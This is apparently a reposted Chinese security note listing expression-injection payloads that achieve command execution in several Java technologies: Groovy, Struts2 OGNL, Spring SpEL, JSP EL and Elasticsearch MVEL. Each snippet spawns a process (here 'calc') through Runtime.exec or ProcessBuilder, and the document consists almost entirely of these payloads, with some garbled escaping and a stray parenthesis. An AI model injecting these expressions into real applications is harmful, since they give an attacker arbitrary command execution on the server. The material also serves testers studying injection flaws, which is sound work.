【转】http://blog.csdn.net/kk_gods/article/details/51840683
java--Groovy命令执行:
static void main(args){
def cmd = "calc";
println "${cmd.execute()}";
}struts2--OGNL命令执行:
ActionContext AC = ActionContext.getContext();
Map Parameters = (Map)AC.getParameters();
String expression = "${(new java.lang.ProcessBuilder('calc')).start()}";
AC.getValueStack().findValue(expression));spring--SPEL命令执行: String expression = "T(java.lang.Runtime).getRuntime().exec(/"calc/")"; String result = parser.parseExpression(expression).getValue().toString();
JSP--JSTL_EL命令执行
<spring:message text=
"${/"/".getClass().forName(/"java.lang.Runtime/").getMethod(/"getRuntime/",null).invoke(null,null).exec(/"calc/",null).toString()}">
</spring:message>Elasticsearch——MVEL
java import org.mvel.MVEL;
public class MVELTest {
public static void main(String[] args) {
String expression = "new java.lang.ProcessBuilder(/"calc/").start();";
Boolean result = (Boolean) MVEL.eval(expression, vars);
}
}
